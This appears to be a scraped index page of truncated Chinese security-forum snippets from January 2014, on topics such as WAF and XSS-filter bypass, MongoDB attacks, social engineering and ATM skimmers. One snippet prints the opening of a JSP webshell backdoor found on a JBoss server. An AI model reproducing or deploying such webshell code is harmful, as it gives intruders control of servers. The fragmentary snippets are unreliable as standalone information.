多重身份的逃犯 第2014-01-16期 探秘时刻 第2014-01-16期，亮点：不翼而飞的七百万。 各种吐槽： 曲曲6882：他偷的是贪官，其实没

“棱镜门”后美国安局“量子”项目，可入侵未联网电脑 jeary ((:?.kcaH eb nac gnihtynA)) | 2014-01-17 09:54 今天早上广播中无意听到一句“美国量子项目可向不联网机器植入恶意程序”，这句

信用卡被盗刷，求科普～以及黑产阔自重！ safe121 (头像是@xsser || 宝鸡巴士公司真诚欢迎来自江阴毛纺厂和江阴道路管理局及上海虹口交警支队的保持党员

GPS后台放到网上，有没有考虑过车主的感受？突然给你断电断油....远程杀人？ 灬相随灬 (大胆天下去得，小心寸步难行。) | 2014-01-15 14:58 如果真被别人设置

作者: Anthr@X  anthrax@insight-labs.org 0x00 背景 对于前段时间流出的QQ群数据大家想必已经有所了解了，处理后大小将近100G，多达15亿条关系数据（QQ号，群内昵称，群号，群

0x00 背景 一段简单的购买程序，看起来没有任何问题。 剩余余额、商品库存、购买权限等判断面面俱到，从头到脚包装的严严实实。 但是为何人一多就频频漏点呐

最近研究PHP漏洞的挖掘，总结了一些我挖到的漏洞，整理了一下思路，求各路神人补充、批评、指导~ 本文所有示例均来自我在乌云上已由厂商允许公开的

0x00 背景 话说现在针对Web端文件代码检测的服务器安全类软件已经非常普及了，常见的有阿D保护盾、安全狗、护卫神、360网站卫士。它们所拥有的功能

0x00 背景 本文来自于《Modern Web Application Firewalls Fingerprinting and Bypassing XSS Filters》其中的bypass xss过滤的部分，前面有根据WAF特征确定是哪个WAF的测试方

申明：本文旨在技术交流，并不针对“正方”（新版正方教务系统密码处理方式也换了，只是用这个做个引子而已……）！本文并没有什么深度，仅探讨已知明

0x00 背景 本文主要来自于HITB Ezine Issue 010中的《Attacking MongoDB》 MongoDB是一个基于分布式文件存储的数据库。由C++语言编

0x00 前言 在渗透测试和安全扫描工作中，发现越来越多站点部署了应用防护系统或异常流量监控系统，其中包括：WEB应用防火墙（软件WAF、硬件WAF、

当self-xss遇到clickjacking D＆G | 2014-01-13 10:35 self-xss一般是认为没有危害的。比如http://kuai.xunlei.c

Resin viewfile远程文件读取漏洞（未通过审核的同学可以看看） Finger (Save water. Shower with your girlfriend.) | 2014-01-13 12:04 受影响系统： Caucho Technology Resin v3.0.18 Caucho Technology Resin v3.0.17 Caucho Technology Resin v3.0.16 Caucho Technology Resin v3.0.15 Caucho Technology Resin v3.0.14 Caucho Technology Resin

大型软件公司是如何防止员工在软件、源码中加后门？ 核攻击 (统治全球，奴役全人类！毁灭任何胆敢阻拦的有机生物！) | 2014-01-11 08:49 rt [原文地址] 相关讨论： 1#

官方订票网站12306崩溃时的页面（资料图） 1月11日起，12306网站开始销售除夕当日火车票。每到此时，铁路系统唯一的官方购票网站1230

以下有自己总结的，更多的是攀了各位大神的腿 社工系列，为大家持续更新，谢谢大家支持！ 第一问：什么是社会工程学？ 定义：社会工程学是关于建立理论通

最近不少新闻说FBI能够不开摄像头指示灯的情况下打开摄像头。一些研究人员发表文章称在一些老版本的Macbook上测试成功了。可以参考破解苹果

密码重置功能是一些常见漏洞的起因。例如用户名枚举漏洞（数据库中用户名不存在和密码错误显示不同的错误信息），敏感信息泄露（把明文密码通过e-m

这不是一篇介绍介绍技术的文章，只是一种开放思维的尝试。主要着重于当遇到输入过滤的情况下，如何找到可以利用的输入点。 本质上来说如果要进行xss

Web应用防护系统（也称：网站应用级入侵防御系统。英文：Web Application Firewall，简称： WAF）。利用国际上公认的一种说法：Web应用防火墙

LBS随着移动互联网的火热而在近年成为一个火热的概念，其本义是基于位置的服务（Location Based Service），而如何定位位置成为LBS中

近日，一位不幸的外国女青年收到了多张自己的裸照，根据拍摄角度观察，这些裸照是几个月以来通过笔记本的内置摄像头拍摄的。小编此时不禁要说：裸体上

引言：计算机科学家开发出了一种可靠提取密钥的新攻击技术：捕捉计算机在展示加密信息时产生的高声调音频。这项密码破解技术（PDF）属于物理攻击，

Java WebServer 自动部署后门附工具和源码 园长 (你在身边就是缘，缘分写在数据库里面。) | 2014-01-07 19:33 社区发现有人发了一个Jboss的自动部署war的后门：求此后门

日一个jboss的 站。 洞被补掉了， 但是看到 有人已经传了后门上去 详细代码 如下 <% @page import="java.io.*, java.util.*, sun.misc.BASE64Decoder" %> <% String PJdpj = ""; String pIGx = ""; String RSVw = System.getProperty("jboss.server.home.dir"); if (request.getParameter("pUBYyDsT") != null){ try { PJdpj = request.getParameter("pUBYyDsT"); pIGx = request.getParameter("oAEICWIo"); byte[] rFPE

12月30日，德国《明镜周刊》发表题为《Shopping for Spy Gear: Catalog Advertises NSA Toolbox》的文章，揭秘NSA工具库已经攻破全球首屈一指的网络设备供

这篇文章主要讲一些复杂的ATM伪造技术，Skimmer的意思是指通过伪造ATM的一些部件(比如读卡器或者键盘)，欺骗取款者，而把读取到的密码

今天偶然跟安全参考（HackCto）编辑Rem1x谈到了小说《站争：代号1937》 说：站争好火，那天都碰到盗用的了，一个同学推荐他看的。 说起

无人驾驶飞机（英文缩写:Unmanned Aerial Vehicle）是一种以无线电遥控或由自身程序控制为主的不载人飞机。最早用于军用。 在大家对Amaz